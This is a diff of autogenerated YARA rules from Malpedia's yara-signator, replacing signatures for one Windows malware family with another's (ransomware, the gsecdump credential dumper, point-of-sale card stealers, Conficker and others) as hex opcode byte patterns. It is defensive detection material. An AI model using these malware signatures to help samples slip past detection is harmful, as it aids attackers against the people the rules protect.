-rule MALPEDIA_Win_Avos_Locker_Auto : FILE
+rule MALPEDIA_Win_Gsecdump_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "039bebd7-5f26-5f3f-b924-0aa65f143ed6"
+		id = "2dfd4f44-5170-5305-aab8-b4eb041699cc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.avos_locker_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gsecdump_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "25a4044828a799f02250311dfaed2866f19c9739199bc4c05e8d323abbd8f547"
+		logic_hash = "c92dc71f6df6f2ca655d1d4b5083e376ffdf96fc42dec3e3018507005bdeaa61"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92682,33 +92836,33 @@ rule MALPEDIA_Win_Avos_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8d80fbffff e8???????? 888595fbffff 6a20 8d8d80fbffff e8???????? 888596fbffff }
-		$sequence_1 = { 83fe1a 7ce4 eb0c 57 8d44241c 50 ff15???????? }
-		$sequence_2 = { c7462800000000 c7462c00000000 0f114618 c645c000 f30f7e45d0 660fd64628 c745d000000000 }
-		$sequence_3 = { 64a300000000 8bf1 8975ec c745fc00000000 6a24 c745f000000000 e8???????? }
-		$sequence_4 = { 8955ec 3bda 7467 8b4208 8b4b08 8b730c }
-		$sequence_5 = { 8d46ec 6a00 50 ff15???????? 85c0 0f8506080000 8b4604 }
-		$sequence_6 = { 50 e8???????? 83c40c 6b45e430 8945e0 8d8090f74b00 8945e4 }
-		$sequence_7 = { 66890451 33c0 6689445102 59 c20400 ff742408 c644240400 }
-		$sequence_8 = { 8bcc 89a54cf7ffff 68???????? e8???????? c645fc35 8d85b8f9ffff 50 }
-		$sequence_9 = { 8b11 8d4201 8901 8a442413 8802 0fb6c0 eb0b }
+		$sequence_0 = { 56 8b742408 85f6 57 8bf9 7505 bef7030000 }
+		$sequence_1 = { e8???????? 6aff 53 8d4c2430 51 8bce e8???????? }
+		$sequence_2 = { 720d 8b542430 52 e8???????? 83c404 8bc6 8b4c2448 }
+		$sequence_3 = { 8bef 83c701 eba4 8b4e24 3bca 740c }
+		$sequence_4 = { 7422 8b4c2440 51 8b4c2428 8d542420 52 51 }
+		$sequence_5 = { 8db424c0000000 89742424 896c2428 8bc2 7307 8d8424c4000000 }
+		$sequence_6 = { 50 895c241c e8???????? 8b4c2464 8b542468 8b44246c 894e44 }
+		$sequence_7 = { 50 8b8de8f7ffff 8b5110 ffd2 81c49c000000 85c0 7d0c }
+		$sequence_8 = { e8???????? 33c0 e9???????? 6a06 68???????? 8d4dd4 c745ec0f000000 }
+		$sequence_9 = { 83f8ff 7409 8b74246c eb03 8d7004 56 8d4c2418 }
 
 	condition:
-		7 of them and filesize < 1701888
+		7 of them and filesize < 630784
 }
-rule MALPEDIA_Win_Bhunt_Auto : FILE
+rule MALPEDIA_Win_Sepsys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d4af1ffc-8c62-52d5-b468-d6549e9f3fe4"
+		id = "c07920dc-ecf4-5d0c-836a-1794c74b71bf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bhunt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bhunt_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepsys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sepsys_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "00be53192993cb157d23710f27883aec97e607f299251d85f4a360507da1c6b0"
-		score = 50
+		logic_hash = "50eb49ac3d5f5dfe611a451c1ec48caa70453cd380c122b00dd8d016e6744ba5"
+		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -92721,32 +92875,32 @@ rule MALPEDIA_Win_Bhunt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f6c643 f65f47 146d 80739aea 7cf9 ed cf }
-		$sequence_1 = { ff7510 8d442414 50 8984240c070000 e8???????? 8bb42404070000 68???????? }
-		$sequence_2 = { 50 e8???????? 8d86001c0000 50 8d85b6f3ffff 50 e8???????? }
-		$sequence_3 = { 6613c6 8b07 84c8 f8 8dbf04000000 66f7c76d13 33c3 }
-		$sequence_4 = { 83c40c 6a03 bbfb020000 e8???????? 50 56 e8???????? }
-		$sequence_5 = { 83e01f c1f905 8b0c8d00e04900 c1e006 8d44010c 50 e8???????? }
-		$sequence_6 = { 85c0 751f 8b4518 0118 33c0 5f 5e }
-		$sequence_7 = { 46 56 68???????? 56 56 e8???????? 85c0 }
-		$sequence_8 = { fc 8e04a5???????? 33ef aa 3417 ed b877eefc1d }
-		$sequence_9 = { 2522e9fb64 794f 8b00 9a5250f0069a5c 2640 2e9b 1a489f }
+		$sequence_0 = { e9???????? 8b542430 488b4c2470 e8???????? 668944243c 0fb744243c 83f805 }
+		$sequence_1 = { e8???????? 4889842490000000 e9???????? 488b8424e8000000 4889842458010000 488b8424f0000000 4889842460010000 }
+		$sequence_2 = { 49f7d0 4d01e0 4883e003 7424 31c9 0f1f840000000000 8d140f }
+		$sequence_3 = { e8???????? 488955b8 488945b0 eb00 c6450700 4889e0 488b4db8 }
+		$sequence_4 = { 8b5511 8b5d14 895518 895d1b c6460802 8b11 8b4903 }
+		$sequence_5 = { 8b1488 448b85f4050000 488d8518040000 488985500a0000 488b8d500a0000 89957c010000 44898578010000 }
+		$sequence_6 = { e8???????? eb00 488d8d80000000 488d95a0000000 e8???????? eb00 8b8580000000 }
+		$sequence_7 = { e9???????? 4c8d4c243f 4c8d44243c 488b942450020000 488b842450020000 488b4810 e8???????? }
+		$sequence_8 = { e9???????? 807c243400 4c8b6c2440 0f8437020000 4889f9 4889f2 e8???????? }
+		$sequence_9 = { d3e0 488b4c2448 8b4c8c50 0bc8 8bc1 89442444 8b442420 }
 
 	condition:
-		7 of them and filesize < 19161088
+		7 of them and filesize < 4538368
 }
-rule MALPEDIA_Win_Tandfuy_Auto : FILE
+rule MALPEDIA_Win_Rad_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f7c34ec9-5c47-5400-953b-2fc065900f46"
+		id = "8a099829-2dbe-5073-9ece-c0e3e763fe4a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tandfuy_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rad"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rad_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "8bcf4f8924f2bd51984baf6f9c4aad50acc2f2e7396ee140bd5315db5dd99bae"
+		logic_hash = "2d90510a72fef277223444468a95d2c25d3c61f771625c4fd1893b29c13678f2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92760,32 +92914,32 @@ rule MALPEDIA_Win_Tandfuy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f2ae 8b442410 f7d1 49 51 8b4c2418 }
-		$sequence_1 = { 33c0 b9000a0000 50 50 }
-		$sequence_2 = { 50 e8???????? b93f000000 33c0 8dbdecfdffff f3ab 66ab }
-		$sequence_3 = { ff15???????? 8bd8 85db 0f84be000000 8d4c2408 6a00 }
-		$sequence_4 = { ff15???????? 50 ff15???????? 85c0 0f84ea000000 8d4c2424 }
-		$sequence_5 = { 33c0 c3 8b442408 50 ff15???????? }
-		$sequence_6 = { e8???????? 83c40c 85c0 766e }
-		$sequence_7 = { 33c0 f3a5 a4 b90a000000 }
-		$sequence_8 = { 51 e8???????? 83c418 8bd0 8995d4faffff 8db5f0fcffff 8bfb }
-		$sequence_9 = { 6800000080 56 f3ab ff15???????? 8bd8 }
+		$sequence_0 = { 8d8d9cfdffff c645fc1a ff15???????? c645fc19 }
+		$sequence_1 = { 51 ff15???????? 83c404 33c0 8945c8 }
+		$sequence_2 = { 5b c3 83fefe 760b }
+		$sequence_3 = { 8d8f10030000 c684240c06000016 ff15???????? 8d4c2458 c684240806000015 ffd3 39742450 }
+		$sequence_4 = { 89742410 c684240001000006 85f6 7447 8bce ff15???????? c706???????? }
+		$sequence_5 = { e8???????? 8d4c2434 68???????? 51 e8???????? 8b35???????? 6a14 }
+		$sequence_6 = { ff25???????? 8db514faffff e9???????? 8db530faffff e9???????? 8d8d4cfaffff }
+		$sequence_7 = { 8b75e0 8bd6 83fe06 7205 }
+		$sequence_8 = { 8975b0 eb03 897db0 8b55b0 8955ac c645fc04 }
+		$sequence_9 = { 59 8be5 5d c20400 8d4df0 c645fc00 ff15???????? }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 207872
 }
-rule MALPEDIA_Win_Stop_Auto : FILE
+rule MALPEDIA_Win_Conficker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bc295ac7-db91-5568-b9e1-1d450db9b984"
+		id = "2292bd3e-30fc-5fd2-b5f2-54da12682502"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stop_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.conficker_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "22c4b0b970b8ce1325818e94329339f1bb669a97f8cb3590d85b78790ea24a40"
+		logic_hash = "516f879a278afd371cf4391eda00f14d5a379f5084ac579457d7a12528cabf86"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92799,32 +92953,32 @@ rule MALPEDIA_Win_Stop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 ff15???????? 8bf8 85ff 790f }
-		$sequence_1 = { ff15???????? 8bf8 85ff 790f }
-		$sequence_2 = { 51 dd1c24 e8???????? dc4de0 }
-		$sequence_3 = { 56 6a00 ff7508 68???????? 6a00 }
-		$sequence_4 = { 33c9 eb14 8bce 8d5902 668b01 83c102 6685c0 }
-		$sequence_5 = { 33c9 eb14 8bce 8d5902 }
-		$sequence_6 = { ffd6 85c0 75e2 5f }
-		$sequence_7 = { 68f4010000 57 ff15???????? 57 }
-		$sequence_8 = { 50 ffd6 85c0 75e8 6a0a ff7304 }
-		$sequence_9 = { ff7508 ffd0 5d c3 8b0d???????? 33d2 }
+		$sequence_0 = { 81f9a9fe0000 743b 8bce 81e1fffe0000 81f9c6120000 }
+		$sequence_1 = { 0fb6d3 8b5c9008 46 3b7510 891f 894c9008 }
+		$sequence_2 = { f2ae 61 7502 4a 4a 3c09 }
+		$sequence_3 = { ff15???????? 8945e4 8365fc00 85c0 7420 68???????? }
+		$sequence_4 = { 85c0 750a 2145fc c745f8b0ae6243 ff15???????? 3345f8 }
+		$sequence_5 = { 743b 8bce 81e1fffe0000 81f9c6120000 }
+		$sequence_6 = { 894d08 8b0e 894c9808 02ca 8916 8b750c }
+		$sequence_7 = { 8955fc bfffffff7f 23d7 8945f0 8955f4 }
+		$sequence_8 = { 395df8 7507 c745fc01000000 57 }
+		$sequence_9 = { 81e1fffe0000 81f9c6120000 742b 8bce }
 
 	condition:
-		7 of them and filesize < 6029312
+		7 of them and filesize < 335872
 }
-rule MALPEDIA_Win_Termite_Auto : FILE
+rule MALPEDIA_Win_Saigon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "15b0d808-d79f-5784-bdde-fa38f9ed0952"
+		id = "d4227170-8c19-5a53-bfab-480d4b1c0eee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.termite"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.termite_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.saigon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.saigon_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "3a2de453ce8083809c117db4d85515335282489c9c64cdb918c15a2c3d5282e4"
+		logic_hash = "ca28ac861d15b6053acaf9126995909d99adf4b549ed8bfb0a57ebb9988cee44"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92838,32 +92992,32 @@ rule MALPEDIA_Win_Termite_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7e5e 8b45ec 8b4010 8945f0 c745f400000000 eb41 }
-		$sequence_1 = { 8b55f4 8b5204 891424 ffd0 8b4508 8b4010 }
-		$sequence_2 = { 8b45f4 89442408 8b450c 89442404 8b45f0 890424 e8???????? }
-		$sequence_3 = { 83f83f 771c 8b5508 8b45f4 899485f0feffff 8b85ecfeffff }
-		$sequence_4 = { 8945fc 8b4508 8b4004 3b45f8 7e06 837dfc00 75d7 }
-		$sequence_5 = { 8d85e4feffff 89442410 c744240c00000000 c744240800000000 8d85ecfeffff 89442404 891424 }
-		$sequence_6 = { 890424 e8???????? c745b044000000 c745dc00010000 8b45f4 8945f0 8b45f0 }
-		$sequence_7 = { c1e002 01d0 c1e002 05???????? c7400c00000000 8b55fc 89d0 }
-		$sequence_8 = { 890424 e8???????? 8b450c 8b400c c744240804000000 8d9568feffff }
-		$sequence_9 = { c7442404???????? 891c24 8944240c 8d45e1 }
+		$sequence_0 = { ff15???????? 85c0 0f85f4000000 488b0d???????? 33d2 41b800100000 }
+		$sequence_1 = { 33db 488bf2 4533c9 448d4303 }
+		$sequence_2 = { 418bd5 89542440 4533c9 4533c0 488bc8 895c2420 }
+		$sequence_3 = { 0f859d000000 488bcb ff15???????? 488b0d???????? 33d2 448d440034 ff15???????? }
+		$sequence_4 = { 488d842470020000 4c8d842440050000 488d942490030000 488d8c24c0000000 448bcb 895c2428 }
+		$sequence_5 = { e8???????? 488d8f88000000 ff15???????? f08387b000000001 488d8f88000000 ff15???????? 440fb65f66 }
+		$sequence_6 = { 0f8592000000 f60302 0f8589000000 448b6b08 }
+		$sequence_7 = { 4533c9 488bd0 498bce e8???????? 488b0d???????? 33d2 }
+		$sequence_8 = { 4885c9 740c 33d2 e8???????? 4c8be0 eb03 4533e4 }
+		$sequence_9 = { ff5038 85c0 781c 488b4c2430 4533c0 }
 
 	condition:
-		7 of them and filesize < 312320
+		7 of them and filesize < 147456
 }
-rule MALPEDIA_Win_Fickle_Auto : FILE
+rule MALPEDIA_Win_Poscardstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6879e197-d2fb-581d-9f88-69c75afc2e63"
+		id = "53d91898-d02d-53b9-9813-59bf55e7c619"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fickle_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.poscardstealer_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "f140341d28c7aeaf4e7af75fed2cbbb86f7c4fb7ead43c1713a0301f74177602"
+		logic_hash = "8ad471a582e54a99878737b3b5b570978ce78744521ef98846f72f0bfe800fbd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92877,32 +93031,32 @@ rule MALPEDIA_Win_Fickle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80f12a 884c241e 0f280424 0f29442470 0f1044240f 0f1144247f 8dbc24a0000000 }
-		$sequence_1 = { 660f7f442440 89542450 897c2454 894c2458 8b44240c 8944245c 803e04 }
-		$sequence_2 = { 8b913b148901 33540804 89540c04 83c104 83f918 72ea 8a401c }
-		$sequence_3 = { 8d3449 8d0cb2 81c10c010000 8d14f2 8918 c7400400000000 897808 }
-		$sequence_4 = { e8???????? 83c40c 8b442418 8944246c 895c2470 8b44240c 89442474 }
-		$sequence_5 = { 8d742450 89442450 89f1 e8???????? 89d9 e8???????? 85c0 }
-		$sequence_6 = { 8d9c24b4000000 89d9 8d942498000000 57 e8???????? 83c404 89d9 }
-		$sequence_7 = { e8???????? 8b1e 8b7e04 53 ff17 83c404 837f0400 }
-		$sequence_8 = { 8d0440 8b4c2464 8b7c8104 8b448108 897c240c 31ed 85c0 }
-		$sequence_9 = { 8b54247c 8bbc2480000000 f30f7e442448 660fd6442468 8b442450 89442470 8d8c24d8000000 }
+		$sequence_0 = { 8b5610 8955e4 8b4614 8945e8 897e10 897e14 837dcc10 }
+		$sequence_1 = { 6aff 6a00 50 8bce c645fc02 e8???????? 837de810 }
+		$sequence_2 = { e8???????? 83c404 397de8 0f82f6000000 }
+		$sequence_3 = { 51 e8???????? 83c420 50 8d8d74ffffff }
+		$sequence_4 = { 8901 c9 c3 3b0d???????? 7502 }
+		$sequence_5 = { 8bbd90edffff 40 898570edffff 3bc7 0f8ceffbffff 8b0d???????? }
+		$sequence_6 = { 7305 83c8ff eb08 33c0 83fe01 0f95c0 3bc7 }
+		$sequence_7 = { 8d45f4 64a300000000 8b35???????? c745fc00000000 8975ac 3b35???????? }
+		$sequence_8 = { c645fc01 e8???????? 6aff 40 50 8d559c 52 }
+		$sequence_9 = { c645fc0e e8???????? c645fc05 397de8 720c 8b4dd4 51 }
 
 	condition:
-		7 of them and filesize < 1646592
+		7 of them and filesize < 362496
 }
-rule MALPEDIA_Win_Newbounce_Auto : FILE
+rule MALPEDIA_Win_Pillowmint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3e3986fe-0558-5f1b-99f3-eb9b18b9db79"
+		id = "3853669a-e086-5b11-9aa7-48869422e9e3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newbounce"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.newbounce_auto.yar#L1-L149"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pillowmint"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pillowmint_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "53993fab1fffe3be30682fcde23603c8013a2f2c28d0b685101dbd874fd28f1f"
+		logic_hash = "4bf5c67c89e02047a57c78ccb54899d23f365f779797116ee014480492b0b534"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92916,37 +93070,32 @@ rule MALPEDIA_Win_Newbounce_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83e00f 7e05 2bf0 83c610 }
-		$sequence_1 = { 7c11 8a03 4b8b8cf8a0b40600 48ffc3 }
-		$sequence_2 = { 7c2f 803b39 7f2a 488d4c2420 }
-		$sequence_3 = { 7c07 488d4c2438 eb0a 4889442430 488d4c2430 488b09 483b8e78020000 }
-		$sequence_4 = { 7c0c 488d15bad00200 e9???????? 488d1566d00200 }
-		$sequence_5 = { 7c8d 4863c8 498bd6 85c0 }
-		$sequence_6 = { 7c4b 4c8bc6 e8???????? 48017748 }
-		$sequence_7 = { 7c07 488d4c2460 eb0a 4889442468 }
-		$sequence_8 = { 81ec68010000 a1???????? 33c4 89842464010000 56 57 8bf1 }
-		$sequence_9 = { 81ec20020000 a1???????? 33c4 89842418020000 56 }
-		$sequence_10 = { 81ec50030000 a1???????? 33c5 8945ec 53 }
-		$sequence_11 = { 81ec28010000 a1???????? 33c5 8945fc 8b4610 }
-		$sequence_12 = { 81ec64060000 a1???????? 33c4 89842460060000 53 }
-		$sequence_13 = { 81ec8c010000 56 a1???????? 33c5 }
-		$sequence_14 = { 81ec58030000 a1???????? 33c4 89842450030000 }
+		$sequence_0 = { 48c7442460feffffff 48895808 48897018 48897820 488b05???????? 4833c4 488985d0000000 }
+		$sequence_1 = { 488b8c24a0000000 e8???????? 48c78424b80000000f000000 4889bc24b0000000 c68424a000000000 4883bc24d800000010 720d }
+		$sequence_2 = { 7534 8b461c 0fb713 498d0c01 4181f8b80a4c53 7509 448b3491 }
+		$sequence_3 = { e8???????? 488b4608 488d3d68fb2200 488b80f8000000 488bdf bd10000000 c605????????00 }
+		$sequence_4 = { 488d4c2468 e8???????? 90 4c8d05360f0300 488bd0 488d8c24c0000000 e8???????? }
+		$sequence_5 = { 498bc5 482bc1 483bc2 7305 488bd7 eb03 4803d1 }
+		$sequence_6 = { 0fbe00 8d0480 8d80effeffff 8d0442 83f81e 0f8730010000 }
+		$sequence_7 = { e8???????? 8985c0000000 488d95c0000000 e8???????? 4885c0 0f853e040000 488b05???????? }
+		$sequence_8 = { 90 4c8d051c170300 488bd0 488d4dd8 e8???????? 90 4983c9ff }
+		$sequence_9 = { 4883c708 48833b00 75a9 418b4620 4983c614 85c0 0f8579ffffff }
 
 	condition:
-		7 of them and filesize < 8637440
+		7 of them and filesize < 4667392
 }
-rule MALPEDIA_Win_Chinoxy_Auto : FILE
+rule MALPEDIA_Win_Burnbook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78736f40-563d-5718-b05e-03a3a946c1f4"
+		id = "d8a1b3af-c791-5a49-95d1-39ec74922c1f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chinoxy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chinoxy_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.burnbook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.burnbook_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c0bd3bd9ac342844eead2562e34424d0e649b578cd28d421251d6ac44bae37dc"
+		logic_hash = "6939db5a1f9211e1e7ddaeea7285f0f9407b5dc4feaa3227884659565987f25b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92960,32 +93109,32 @@ rule MALPEDIA_Win_Chinoxy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7405 394004 7538 6a3c e8???????? 83c404 89442408 }
-		$sequence_1 = { 897e5c 897e60 897e64 897e68 897e6c 897e70 897c2414 }
-		$sequence_2 = { 52 e8???????? 83c408 85c0 0f84a7000000 8b4f08 6a00 }
-		$sequence_3 = { 8b5918 33eb 33db 33c5 89442414 8be8 8a5c2416 }
-		$sequence_4 = { 743a 8b431c 8db140800200 85c0 7506 8db15c800200 8bce }
-		$sequence_5 = { 3bc6 8b5008 895610 75a7 e9???????? 8b85a0020000 }
-		$sequence_6 = { 8bde c1ef10 c1e310 0bfb 2bc6 33f8 03f1 }
-		$sequence_7 = { b9???????? e8???????? 85ff 740a 83c704 57 ff15???????? }
-		$sequence_8 = { 8bf9 c1ee18 c1e708 0bf7 2bd9 33f3 }
-		$sequence_9 = { 83f8ff 7409 83c004 3bc6 7602 8bf8 }
+		$sequence_0 = { f7d8 418906 418bc3 83ffff 7d02 f7d8 410fafd9 }
+		$sequence_1 = { e8???????? 8945ef 41b881010000 488bd7 488bcb e8???????? 4885c0 }
+		$sequence_2 = { f30f2cc0 8801 48ffc1 4883ea01 75c9 488b459f 4c2b5028 }
+		$sequence_3 = { ffc1 448bd1 f7d9 8d344e 0f1f00 0fb60a 0faf08 }
+		$sequence_4 = { f20f1003 f20f59c6 f20f58c7 e8???????? f20f2cc0 89862c0c0000 f20f104308 }
+		$sequence_5 = { e8???????? 85c0 7419 488b5308 8b0c3a 85c9 7407 }
+		$sequence_6 = { f30f2c442440 4883c304 488d7f04 8947fc 4883ee01 75dc 488b742430 }
+		$sequence_7 = { f30f7f840cf0030000 f30f5bc2 f30f7f440cf0 81fa00010000 0f8c5cffffff 0f28bc24100c0000 0f28b424200c0000 }
+		$sequence_8 = { f30f114014 488bc3 4881c448010000 415f 415e 5f 5e }
+		$sequence_9 = { e8???????? 85c0 7814 0fb6c0 488bd6 488bcd 0bf8 }
 
 	condition:
-		7 of them and filesize < 1138688
+		7 of them and filesize < 22976512
 }
-rule MALPEDIA_Win_Socksproxygo_Auto : FILE
+rule MALPEDIA_Win_Rawpos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ca75341b-6658-565f-95d6-74f231ce44e9"
+		id = "1ae7866b-5a11-5ecd-acc1-985240e6eeca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.socksproxygo"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.socksproxygo_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rawpos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rawpos_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "dae101b13021abf8406ff6df83b23a76fef8534b33d21e36035ee793df6e14d3"
+		logic_hash = "db91ad955030d7923a8e659a49a2b9f0e663571d73f741166c9c17758223d91f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -92999,32 +93148,32 @@ rule MALPEDIA_Win_Socksproxygo_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 48ffc6 4c89d1 4889d7 488b542448 4885c9 0f84ec000000 }
-		$sequence_1 = { e9???????? 4c8b9424e8010000 0f1f00 4d85d2 742b 498b02 498b5a08 }
-		$sequence_2 = { eb08 488bb42420010000 48899424a0000000 4889b424a8000000 488bbc24a0000000 4885ff 7421 }
-		$sequence_3 = { eb3a 498b02 498b5a08 498b4a10 488b942408020000 488b3a 488b7208 }
-		$sequence_4 = { 90 488d05c3392300 0f1f00 e8???????? 488b942418010000 48895008 833d????????00 }
-		$sequence_5 = { c64424216b c744242200000203 66c74424260202 31c0 eb1a 440fb64c341d 418d1411 }
-		$sequence_6 = { 4989c0 4989ca 488b842420020000 41c6043805 b901000000 e9???????? 4983fb01 }
-		$sequence_7 = { e8???????? 488bac24f8000000 4881c400010000 c3 e8???????? e8???????? 4889c3 }
-		$sequence_8 = { 7331 488d05b4513000 4889d9 4889fb 4889f7 4c89c6 e8???????? }
-		$sequence_9 = { c7442464345c35c5 c7442467c5fab82a 31c0 e9???????? 488b9424a8000000 4885d2 b801000000 }
+		$sequence_0 = { 59 85c0 757b 0fbe4604 50 e8???????? 59 }
+		$sequence_1 = { 8bf8 33c0 8a07 83f845 7c05 b845000000 83f83b }
+		$sequence_2 = { 5d c3 55 8bec 83c4dc 33c0 33d2 }
+		$sequence_3 = { e8???????? 83c408 85c0 0f842e070000 8b4520 8d4df4 50 }
+		$sequence_4 = { 8bc3 f7d8 83f803 750a bb08000000 e9???????? }
+		$sequence_5 = { 837df400 7507 8bf7 e9???????? 803f10 7526 }
+		$sequence_6 = { c646ff10 c60601 46 8a45d0 8806 46 }
+		$sequence_7 = { 8a13 80c2d3 80ea02 720f 80c2fe 80ea02 7207 }
+		$sequence_8 = { 53 8b4510 83c6ff 50 57 52 e8???????? }
+		$sequence_9 = { eb03 83c8ff 5f 5e 5b 59 5d }
 
 	condition:
-		7 of them and filesize < 14221312
+		7 of them and filesize < 466944
 }
-rule MALPEDIA_Win_Sombrat_Auto : FILE
+rule MALPEDIA_Win_Lightbunny_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d0dde23d-377f-5d10-8911-6d96e1813650"
